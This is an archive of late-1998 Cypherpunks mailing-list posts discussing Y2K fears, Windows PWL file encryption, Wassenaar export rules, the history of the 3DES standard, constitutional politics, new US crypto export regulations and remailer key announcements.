contribute to the effort,,,

Reeza!
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 29 Dec 1998 21:50:49 +0800
To: Mok-Kong Shen <cypherpunks@cyberpass.net
Subject: Re: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
In-Reply-To: <199812290802.AAA28246@netcom13.netcom.com>
Message-ID: <3.0.5.32.19981229232715.0088dd30@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 10:15 AM 12/29/98 +0100, Mok-Kong Shen wrote:
--snip of magnanimous import--
>
>Is is (approximately) known how many percent of the owners of computer
>systems have ever tried with some test cases to find out whether
>their hardware/software could be susceptible to the Y2K problem?
>I guess such tests would deliver some confidence intervals of
>whether the problem could actually arise at 2000.
>

What, you trying to downplay the tumult and ? that y2k will cause??? the
fearmongerers will not be happy with you. They want everyone to be begging
them for mercy, safety, deliverance from the y2k bug. 

What? you say consumers should actually test their own shit? You forgot to
mention the outside consultants who should be brought in at xyz dollars per
hour. To think that Joel and Janice Consumer might actually be able to test
their own equipment for y2k compliance. 

y2k is coming, or else!!! (read, it will be manufactured if it does not
eventualize itself).

Reeza! 
============================================================================
DH Key available upon request.


The affairs of Men rarely rely on the dictates of logic, or even common sense.


	"Yeah, they mostly rely on something below the belt."

				-- my older sister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Rowley <bc192@freenet.carleton.ca>
Date: Wed, 30 Dec 1998 12:52:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PWL files
Message-ID: <199812300430.XAA12372@freenet3.carleton.ca>
MIME-Version: 1.0
Content-Type: text



> > I've been trying to figure out the method of encryption for OSR2 Win95 and
> > Win98 *.pwl files and I was hoping someone had some details about the
> > method used. [...] Does anyone have it figured out?
>
> I think Peter Gutmann and someone else figured it out sometime ago.

Peter Gutmann figured out the old system. In reaction the system was
changed by the OSR2 patch and in all further releases of Windows. What
exactly it was changed to is the question.

Chris.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 30 Dec 1998 19:20:49 +0800
To: Ben Laurie <ulf@fitug.de>
Subject: Re: Wassenaar summary (and a funny new loophole)
In-Reply-To: <199812101815.TAA120782@public.uni-hamburg.de>
Message-ID: <3.0.5.32.19981230011725.00a4b940@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Unfortunately, since Wassenaar is not the law, only an agreement
by bureaucrats to make laws or regulations sort of like it if
they can talk their pet legislatures into rubberstamping them,
this doesn't help.  

You can't take a bureaucrat to court and 
insist that she rescind a regulation that was stronger than the 
Minimum Daily Repression specified in the "Arrangement" -
you can only insist on whatever your nation's constitution (if any)
or fundamental rights document (if any) specifies, 
or perhaps go to the World Court or some European Union or 
European Community court and argue the case there.
But most of these rights documents say things like
"except for national security" and aren't very enforceable
even if they do plainly state that your rights are stronger than that.

>Ulf Mller wrote the following about mistakes in Wassenaar:
>> Since the definition differentiates algorithms by symmetry rather than by
>> their cryptographic properties, there is no restriction whatsoever on
>> asymmetric secret-key encryption algorithms. Those algorithms typically
>> are not based on factorization or discrete logarithms. That is, they are
>> no longer controlled by the Wassenaar arrangement.

At 07:06 PM 12/10/98 +0000, Ben Laurie wrote:
>Hmm - so if I defined a new crytpo algorithm, SED3, say, that looks likethis:
>SED3(k,x)=3DES(backwards(k),x)
>where backwards(k) is k with its bits written backwards, then the
>3DES/SED3(k1,k2) combination is exportable (where k1 is related to k2,
>of course, by k2=backwards(k1))?

I assume you mean 3DESDecrypt(backwards(k),x) ?  It still doesn't work,
because 3DESEncrypt is still symmetric with 3DESDecrypt,
and SED3Decrypt is still symmetric with 3DESEncrypt(backwards(k),x).
But you could still come up with something that meets the
letter of the non-law, just for the fun of tweaking them.

I think it's more realistic to go for the various
General Software Exemptions and Public Domain Exemptions,
and generally lobby legislatures to slow down on implementing Bad Things,
and let them see there's money to be made for their countries' 
local businesses by not cooperating.  

A potentially valuable change to go for would be to allow 
export between members of the Wassenaar, or the EC, or whatever.
After all, the whole purpose of the COCOM that Wassenaar grew out of
was to keep Commies from getting militarily valuable technology,
and now that there aren't any Commies (unless you count the Chinese or Cubans)
and they've let the Russians into Wassenaar, the whole thing's
prima facie stupid anyway.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 30 Dec 1998 01:05:44 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: SNET: United Nations plans SWAT team training to "control" citizens in Y2K crash
In-Reply-To: <199812290802.AAA28246@netcom13.netcom.com>
Message-ID: <3.0.5.32.19981230023707.009913c0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 04:54 PM 12/29/98 +0100, Mok-Kong Shen wrote:
>
>In WHICH word I wrote I was downplaying???  I think you are up-playing!
>Are you a consultant, desiring to earn money? If not, then try
>to keep discussion to real matters of the problem.
>

Sorry, yes I am up-playing, for the sake of humor. No, I'm not a
consultant, Yes I desire to earn money, and the real problem (as I see it)
isn't with the hardware or software, it is with what people will do.
Regardless of anything relevant or irrelevant, what the sheeple think can
happen, what they see happen, what really does happen and how some of them
will over-react to it. 

All the Gov't's making plans for martial law is an enormous alarm going off
in my head,,,,

Reeza!
============================================================================
The affairs of Men rarely rely on the dictates of logic, or even common sense.

	"Yeah, they mostly rely on something below the belt."

				-- my older sister

	"Shhhhh. You're flooding my inbox with crap. How about giving it 
	a rest for a bit? I know you're probably bored wherever you are, 
	but please."
				-- krys




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Wed, 30 Dec 1998 17:07:51 +0800
To: X <xasper8d@lobo.net>
Subject: Re: cookie sniffers?
In-Reply-To: <36894498.7418B40@netcomuk.co.uk>
Message-ID: <19981230083901.A12430@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Dec 29, 1998 at 02:57:12PM -0700, X wrote:
> While you register for a hotmail acct., do they sniff around to see who you
> really are?

I don't know what you mean 

> Or is it anon?

well it gives the IP address you connect from in the header...

and my guess is that most anon proxies are banned (?)

-- 
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/

    never put off until tomorrow what you can do the day after tomorrow.
                        -- mark twain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Vogt <tv@wlwonline.de>
Date: Wed, 30 Dec 1998 16:21:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: SNET: United Nations plans SWAT team training to "control"  citizens in Y2K crash
In-Reply-To: <199812290802.AAA28246@netcom13.netcom.com>
Message-ID: <3689D9AF.E0F1ABCE@wlwonline.de>
MIME-Version: 1.0
Content-Type: text/plain



Reeza! wrote:

> Sorry, yes I am up-playing, for the sake of humor. No, I'm not a
> consultant, Yes I desire to earn money, and the real problem (as I see it)
> isn't with the hardware or software, it is with what people will do.
> Regardless of anything relevant or irrelevant, what the sheeple think can
> happen, what they see happen, what really does happen and how some of them
> will over-react to it.


aside from the humor (which I agree on) you might be right. someone said
not too long ago that the real y2k problem is in the people's mind. test
yourself: born in the summer of '68, the 70s, sign with name and date:
28.12.98 <signature>. people THINK two numbers, which might be the real
reason so much software is written using two bytes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 31 Dec 1998 01:16:17 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: CLT&G Update: 29 Dec 98
Message-ID: <368A5A98.B0E@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>>      Jefferson and Madison were fearful, as more Americans should
>>   be today, of allowing power to be concentrated in the central
>>   government.
>
>The entire point of a consitutional democracy is to avoid >centralization.
>
>A better way to word this is that we should be afraid of the federal
>government becoming the central government.
>
The ENTIRE point?

ONE of the points was to define and limit the extents of centralization. 

There is no cure for the chronic tendency of people in power to try and
increase their scope. The repeated application of palliatives is the
only way to deal with that social disease.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 30 Dec 1998 18:11:12 +0800
To: cypherpunks@cyberpass.net
Subject: distribution scheme
Message-ID: <199812300946.KAA29026@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



forget my earlier mail saying I had uploaded to funet.fi - seems
I get "permission denied" from both there and csua.berkeley.edu
even in the incoming dirs.
am I missing something here? please tell me where I can upload.

Falcon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 31 Dec 1998 00:35:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Triple DES "standard"?
Message-ID: <v04020a06b2affd7b8e10@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Reply-To: <rankney@erols.com>
From: "Rich Ankney" <rankney@erols.com>
To: <dcsb@ai.mit.edu>, "Digital Bearer Settlement List"
 <dbs@philodox.com>,
        "Robert Hettinga" <rah@shipwright.com>
Subject: Re: Triple DES "standard"?
Date: Wed, 30 Dec 1998 09:40:38 -0500
Sender: <dbs@philodox.com>
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>

<snip>
> 	Actually, as I recall the tale, the Amercian Bankers
> Association-sponsored ANSI-accredited X.9 Committee's blessing of DES3
was
> itself pretty interesting.
>
> 	I understood that the NSA lobbied bitterly against the X9 effort to
> standardize 3DES as an ANSI standard, insisting that DES would surfice
> until its successor was chosen.
>
> 	A couple years ago, when the X9 committee -- or maybe one of the X9
> crypto subcommittees -- rejected that advice and initially recommended
that
> 3DES be made a standard, I was told that the NSA rep angrily declared
that
> 3DES would _never_ get an export license and would never be shipped
> overseas. (Which may have put a damper on the 3DES standardization
> effort;-)
>
> 	Unfortunately, these standards development efforts usually escape
> the media's attention. Anyone on the list active in X9 and can give us
the
> real story?
>

I was at the meeting.  This was a meeting of (I think) X9F3, which is a
working
group in X9F, which has several working groups doing security.  3DES was
being pushed really hard by the Fed.  The vote was to get a sense of how
much interest there was in a 3DES standard.  (There is no requirement to
have such a vote to work on something; the X9 rules require a new work item
ballot sent to all X9 members.) The NO votes were, IIRC, from NSA (with the
above quote, more or less), IRS, and IRE (a commercial outfit located in
Baltimore).  NIST abstained.  I don't recall the official X9 vote, but it
was along
the same lines.  The work was done in a different working group, X9F1,
chaired
by the legendary Blake Greenlee.  The standard was published a few months
ago.  Again, the Fed pushed really hard on this; kudos to them.

I'm sure Cindy Fuller of the X9 Secretariat (cfuller@aba.com) would have
the
official X9 ballot results if anyone is interested...

> 	Since the birth of X9 in the late 70s, the US National Security
> Agency has its own representative on the X9 Committee.  As one might
> expect, the NSA has traditionally had significant influence over the ANSI
> "F" (crypto) subcommittees and cryptographic standards in financial
> services. There was a time when Ft. Meade effectively dictated those
> standards. Now, that is not necessarily so....
>

> 	(After the NSA blundered so badly in trying to force the Banking
> industry to switch from DES to CCEP/Clipper in the late 80s, the Agency's
> mesmerizing control broken. The initial intro of CCEP/Clipper -- at an
ABA
> meeting -- proposed that only US owned institutions could have access to
> Clipper.  At the time, as I recall, maybe 10-15 percent of the US banks
> were foreign owned;-) The bankers couldn't believe that these idiots --
> obviously so ignorant about the workings of the industry they were trying
> to defacto regulate -- were from the NSA of Legend and Lore.)
>

I didn't start attending meetings till the early '90's, but I can certainly
testify that Clipper/Fortezza were pushed really hard.  In fact, X9F1 may
still have open work items on some of this stuff (no work going on, but
it needs a formal vote to remove it from the list).  My major objection was
the attempt to standardize on a particular *product*, which used classified
algorithms, vs. standardizing on a public algorithm which could be
implemented
in H/W or S/W.  So X9 ended up with:  3DES instead of Skipjack; DSA and
RSA (and ECDSA real soon now) for signatures; and DH, RSA, and EC (real
soon now) for key management.  It's interesting that our DH standard seems
to have reinvented much of the interesting stuff in KEA.


Regards,
Rich

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 31 Dec 1998 01:17:39 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: CLT&G Update: 29 Dec 98 (fwd)
Message-ID: <199812301657.KAA05177@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Dec 1998 08:53:44 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: CLT&G Update: 29 Dec 98

> >The entire point of a consitutional democracy is to avoid >centralization.
> >
> >A better way to word this is that we should be afraid of the federal
> >government becoming the central government.
> >
> The ENTIRE point?

The ENTIRE point.

> ONE of the points was to define and limit the extents of centralization. 

No, the point of a democratic government is to eliminate centralization of
authority. To distribute and limit what each level can do from the top to
the bottem. Read the 9th and 10th again.

> There is no cure for the chronic tendency of people in power to try and
> increase their scope. The repeated application of palliatives is the
> only way to deal with that social disease.

If you truly believe this then you should shoot yourself now and get it over
with.

There is a cure, that cure is to recognize the behaviour in people and build
systems that limit the opportunity to express it. The best plan we've come
up with so far is constitutional democracy.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Thu, 31 Dec 1998 03:03:50 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: limitations of fed power (was CLT&G Update: 29 Dec 98 (fwd))
In-Reply-To: <199812301657.KAA05177@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.981230111722.19614A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 30 Dec 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Wed, 30 Dec 1998 08:53:44 -0800
> > From: Michael Motyka <mmotyka@lsil.com>
> > Subject: Re: CLT&G Update: 29 Dec 98
> 
> > >The entire point of a consitutional democracy is to avoid >centralization.
> > >

That would be a valid point if we were living in that arrangement.  I
like to be a little more specifc.  We are living in a democratically elected
reprentative constitutional republic.

The point of that constitution is to shackle the tendancy of
a bureaucracy from assuming authority over matters never
assigned to it and using its enforcement powers to assure it.
Eventually the people, wallowing in ignorance, forget the 
infraction and the bureacracy assumes de facto control.

More eloquently stated:

"Our Constitution has accordingly fixed the limits to which, and no
further, our confidence may go... In questions of power, then, let no more
be heard of confidence in man, but bind him down from mischief by the
chains of the Constitution." --Thomas Jefferson: Draft Kentucky
Resolutions, 1798. ME 17:388

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Thu, 31 Dec 1998 03:20:38 +0800
To: cypherpunks@cyberpass.net
Subject: National Know Your Bank Day
Message-ID: <Pine.SOL.3.91.981230114949.19614B-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



In the interest of National Know Your Bank Day, for what its worth,
I'd like to address the issue of perpetual public debt that the 
Federal Reserve System and our esteemed Congress has foisted on us.

Here is a wonderful and powerful quote from Mr Jefferson.

"To preserve [the] independence [of the people,] we must not let our
rulers load us with perpetual debt. We must make our election between
economy and liberty, or profusion and servitude. If we run into such debts
as that we must be taxed in our meat and in our drink, in our necessaries
and our comforts, in our labors and our amusements, for our callings and
our creeds, as the people of England are, our people, like them, must come
to labor sixteen hours in the twenty-four, give the earnings of fifteen of
these to the government for their debts and daily expenses, and the
sixteenth being insufficient to afford us bread, we must live, as they now
do, on oatmeal and potatoes, have no time to think, no means of calling
the mismanagers to account, but be glad to obtain subsistence by hiring
ourselves to rivet their chains on the necks of our fellow-sufferers."
--Thomas Jefferson to Samuel Kercheval, 1816. ME 15:39




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 31 Dec 1998 03:34:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: limitations of fed power (was CLT&G Update: 29 Dec 98 (fwd)) (fwd)
Message-ID: <199812301902.NAA05632@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 30 Dec 1998 11:46:39 -0700 (MST)
> From: Jim Burnes - Denver <jim.burnes@ssds.com>
> Subject: limitations of fed power (was CLT&G Update: 29 Dec 98 (fwd))

> > > >The entire point of a consitutional democracy is to avoid >centralization.
> > > >
> 
> That would be a valid point if we were living in that arrangement.  I
> like to be a little more specifc.  We are living in a democratically elected
> reprentative constitutional republic.

A representative democracy is still a democracy. The ONLY guarantee of limits
in ANY democracy is whether it is constitutional or not. That is the
defining issue because that is what limits and defines the governmental
structures. The defining issue is not whether it is representative or direct
but rather that it has a constitution. A constitution and a bill of rights
are in no way a requirement for a democracy (representative or direct). That
constitution is what prevents mob-rule.

> The point of that constitution is to shackle the tendancy of
> a bureaucracy from assuming authority over matters never
> assigned to it and using its enforcement powers to assure it.

Which is the point under discussion after all.

> Eventually the people, wallowing in ignorance, forget the 
> infraction and the bureacracy assumes de facto control.

That is a function of human psychology and not democracy. Blaiming democracy
for a function of human behaviour is more than a  little misleading. People
are social animals. It's gotten us this far and there is no reason to expect
a radical shift in human population dynamics in the near term. Really a moot
point. It is also the reason the constitution splits authorities, per the
9th and 10th, as it does. The fundamental aspect of a working democracy is
conflict, not cooperation as much of todays spin doctor press would have you
believe. And by conflict I don't mean spilled blood in the streets.

What is really amazing about it is that we have the intelligence to
recognize and deal with the trait at all.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Malachi Kenney <kfringe@exit109.com>
Date: Thu, 31 Dec 1998 02:45:09 +0800
To: Sunder <sunder@brainlink.com>
Subject: Re: Roast pesky car theives with a flame thrower!
In-Reply-To: <368166A6.D950FE25@brainlink.com>
Message-ID: <Pine.BSF.3.96.981230132212.15506A-100000@hiway1.exit109.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Dec 1998, Sunder wrote:

> http://www.cnn.com/WORLD/africa/9812/11/flame.thrower.car/
> 
> Don't you wish these were legal in the USA? :)

They are. Just don't get caught with one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 31 Dec 1998 03:05:33 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: New Crypto Regs
Message-ID: <199812301835.NAA26972@smtp3.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to Ed Roback, NIST: BXA issued a press release today 
on new crypto regulations:

   http://www.bxa.doc.gov/press/98/1230encryption.html (copy below)

The regs themselves are available today only in hardcopy
in Washington DC on display at the Federal Register, but 
the electronic version will be published in the Federal Register 
tomorrow and will be on the BXA Web site <www.bxa.doc.gov>. 

Anybody in DC who could get a copy of the hardcopy and 
fax it to us, it would be appreciated:

Fax: (212) 799-4003
Vox: (212) 873-8700

----------

Commerce Updates Export Controls on Encryption Products

(Washington, D.C.)     The Commerce Department will publish 
new regulations significantly streamlining government export 
controls on powerful encryption -- products that scramble computer 
data -- as part of the Clinton Administration initiatives to make 
government more efficient and enhance the global competitiveness 
of U.S. businesses. These amendments to the Export 
Administration Regulations, on public notice today at the 
Federal Register, end the need for licenses for powerful U.S. 
encryption products to companies worldwide in several 
important industry sectors after a one time review by the 
Commerce Department. The regulations implement the 
policy changes announced by Vice President Gore in 
September.

"Through the hard work of industry and government officials 
to finalize this regulation, U.S. encryption firms will be better 
able to compete effectively with encryption manufacturers 
around the world," said William A. Reinsch, Commerce 
Under Secretary for Export Administration. 

Virtually eliminated are restrictions on selling powerful 
computer data scrambling products to subsidiaries of U.S. 
corporations. There will also be favorable licensing treatment 
to strategic partners of U.S. companies. Strong U.S.-made 
encryption products are now available, under license exception, 
to insurance companies headquartered in 46 countries and 
their branches worldwide. Sales of powerful encryption to 
health and medical organizations in the same countries are 
also eased. To facilitate secure electronic transactions, 
between on-line merchants in those same countries, and 
their customers, the updated regulations permit, under a 
license exception, the export of client-server applications 
(e.g. SSL) and applications tailored to on-line transactions 
to on-line merchants. A list of eligible countries is posted 
on the BXA web-site. 

Further easing government restrictions are new allowances 
for U.S. encryption manufacturers to share their source 
code with their own foreign subsidiaries (while requiring that 
any resulting new products remain subject to U.S. regulation ) 
and streamlining reporting requirements for U.S. firms so that 
compliance is less burdensome.

The new regulations expand the policy of encouraging the 
use of recoverable encryption by removing the requirement to 
name and approve key recovery agents for exports of key 
recovery products from regulations. It also defines a new 
class of "recoverable" encryption products which can now 
be exported under Export Licensing Arrangements to foreign 
commercial firms for internal company proprietary use. 

As part of its stated goal to balance the needs of national 
security and public safety with the desire to protect personal 
privacy and strong electronic commercial security, the 
Administration continues to encourage the development 
and sale of products which enable the recovery of the 
unscrambled data, in an emergency situation.

Finally, the regulations eliminate the need to obtain licenses 
for most encryption commodities and software up to 56-bits 
or equivalent strength.

[End] 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 30 Dec 1998 21:48:03 +0800
To: cypherpunks@cyberpass.net
Subject: distribution scheme
Message-ID: <199812301314.OAA10146@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




I'm sorry, but it seems I have missed the original mail, i.e. the first quote here.
if there is anything important in it that was not quoted, please include it
somewhere in your replies. I hope I haven't missed any other mail.

>>Falcon, aka FitugMix, wrote about a suggestion to chop crypto or other 
>>contraband material into separate streams, e.g. bit 1 of each byte in 
>>stream 1, etc., hoping that this would be "legal" because it's not
>>really 
>>encryption, though if managed carefully it would still be hard to read.

>this concept is virtually identical to fractal encryption, where a
>message is chopped into its component parts (25 a's, 3 b's, 8 c's, and so
>on) and also chopped into a configuration scheme.  this form of
>encryption does fall under the definition of munitions by the u.s.
>government...

yes, I found that out in the meantime. the legal aspect falls short
of my expectations. I still consider the scheme to be both simple and
useful because it actually changes the byte structure, so looking
for 'a' or 'e' or similiar pattern-analysis does not work anymore. in
combination with steganography, I believe this can make things really
hard to find, but I'm willing to learn the opposite if someone with
more cryptoanalysis know-how tells me. if I'm right, it might still
be useful for people, e.g. in china working outside their local laws
anyways.
it probably needs extension before it's really useful, so I have put
up the code on funet.fi (pub/crypto/cypherpunks/incoming). take a
look and tell me what you think, please.


Falcon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johannes Kroeger <hanne@squirrel.owl.de>
Date: Wed, 30 Dec 1998 22:03:15 +0800
To: mail2news_nospam@nym.alias.net
Subject: FINAL REMINDER: New PGP and Mixmaster keys at squirrel.owl.de
Message-ID: <19981230141719.A24646@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3999.1071713824.multipart/signed"

--Boundary..3999.1071713824.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

New keys at squirrel already in use; old ones expire on January 1, 1999.

Key for user ID: Squirrel Remailer <mix@squirrel.owl.de> (EXPIRE:1999-07-01)
2048-bit key, key ID 912CA289, created 1998/11/25

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3in

mQENAzZcErkA2gEIAMQpXNh1i9puYy/XwQIA8UrK+3BIPyCd92GBCqubdsJeEhAV
cOCwfk3g0XGBDYiJBSkCqHG06IZMnXU6BVyukcLEUrmJXeyum7Nc6287ZBT92Ebm
XCivROmMiOi2ZpdLUf2Na3QbFyUbZDu/vFTL64wJh3pqjP6BokpVoJi6IIGj7AS3
/Hi2iX9+jP80KUYfMZO0lAW3lTwXYtyduRuT8EoV71/+GTu/DNSBylXdR1zZVueH
531jDOysZbK+kqdlBc3U6GZYe405WVY8xbOprojI4nguPLKC19biLu2hJfFIYElX
7wvBBOMrIlUisvvsO1xm7XKdo/69fYC945EsookABRG0O1NxdWlycmVsIFJlbWFp
bGVyIDxtaXhAc3F1aXJyZWwub3dsLmRlPiAoRVhQSVJFOjE5OTktMDctMDEpiQEV
AgUTNlwUCLwPSJ4oQv5pAQE+iQgAzYGKS1rNcqQLzeKPAIfX0NrPfuHPWww+b9ZF
y9d/dTPeR6dmdX4DbVguuYsRAO6rttklsYJRXpRN1CPO4pFGdSZhbfD2aaKQmADX
Y3x0Jjf83jZhHo4sgWF6KxzZXNnZgao1Kkk4BNS8uRBy1jc6e/rTMhRrVABu5nt2
/NZEW8RrrRP3gOb1OSypieBKAfShxskLTiV5yi9rm2IRNhrRnadAygFiKjKBWIGy
gKQgWuFNltXrMWriMffg5TVe+PjlTVIynkM9gjdQgE/cg56rqHkv/H5I6UsY0fol
dYuNuATT+a1fbflqTfdjZYryEJZR3xndrCQk6wJbu8IMq8U1aokBFQMFEzZcE3oe
XusFsYA8HQEBMYMIAJW3NETaKOaj3HA+mzHtmKf5GybI5yBBQ++NchMYOVBcJlHU
3euZx0kjgkjdm2SFZIZnjaLqYS7Nk4IJYMcvsGBrEtk7TFtyEZ8uHOQgUN1nbmOv
tYr8gO7OyS/XULjz8uCuEvDza2dIBBiWstgxUOoKjMSXrjlMT4MRYPUphZS7Wf5n
aNE2Y2cD0ANZIFbB3afc96TNtnO+VKnH2hIPWDogoSVGCO4Y1wqsH+VwiRwoLPcY
R5qiWITbK6Ax3JCHv/a27VMiv4uHNDLU+FGq/8ksk9/EclWN2+Ni3qMD1aI/pTtt
3XhHBc8tLgWpW8J7Yy9DNxZmaAArqut4FqjPudKJARUDBRA2XBMRfYC945EsookB
AQyuB/9hDivQELGw37CwDIgqmqdF31SpJeuHxhm4/BQg3Gc0Ezn3WaetkheX9p9+
lsEEq36oknIyg8GYgTr3nsRTgJXuwssB0SkiB+x3CkYegsuCgh30xAaxVB3RlIfU
ny75Ltxl52p387bJ2sDc3STUQBEAy0HfjlgD98p7IO38D/rw/WWrXTko6rCcnuEx
AzJ2Lx9klS0GLq/PxS9wK3V/5VM4rxMEhcnog+lHF1/GpvGnXAtNJztqqgdijjW8
C8qEJRKKh9c5PTCxBfwqLOHxsGCeBaEDzjO/LyCEohYlwZhBlVqN56zS6z0y7yBL
AAF5qt39x2jsrKSH9p9fpZO06WuB
=Yqyh
-----END PGP PUBLIC KEY BLOCK-----

=-=-=-=-=-=-=-=-=-=-=-=
squirrel mix@squirrel.owl.de 3de441b2b721e4853259ae6952a0cfca 2.0.4b43 CNm

-----Begin Mix Key-----
3de441b2b721e4853259ae6952a0cfca
258
AATdqb9WxExPliCxZIZ9GZyXCGZZiDa4bwZPSP4S
lz7UORYAZu+rjGDinf4lfmPxfZIcF0X1oefLetF4
TxN4dZxmJWqz65NufN7pu4BngA1yGcV5Mn7LqbJh
8kqlGEdUFeb4LJTxhYW1flD1HEfmfE4nuYMQniSb
oXLX1rypyH9OiwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

-- 
Johannes Kroeger		<hanne@squirrel.owl.de>
Send mail with subject "send pgp-key" to get my PGP key


--Boundary..3999.1071713824.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjNp
bgoKaVFFVkFnVUJOb29uM2J3UFNKNG9RdjVwQVFId29RZ0FsYit2dnF0Z2xi
NytDRXRaVml0ZUVVazl0V1MyUEFidAp3SThHbE15WnRsRlhOdzNKY050QTNM
Ni9wbFd0dC9mYWh0UFp6Wjdwc1FNSUxCQUprbUNBUzVVci9ES0EvQ3hhCjNG
OE9KdDhreEtjRWFtazR5bGxCaHI0UFlkWmEzRUs2TGg5a01TYW5oNWtpZXU1
dGc2OGFEUXNneHlpeS9OcisKcWxBY0l4dGI5MGQ2YU1HWlBLSlQwRVViYVRU
KzFuNEhSWno5TGpUUTB6Q0pUMkZqWEZjdE9rSnMyMmNGcnpDOQpwM2xmSHlT
YWF2QlNxTy8yMXhia3d4RTlqcTdkMlBCQnl6a2czNlhuNVBIOTNWMHlXZjdJ
ZElRRWt6T3BkWHNSCjQxWk1GdFZjRE1laHRuY01leTFpZEhsSzNFcnU0d1Yr
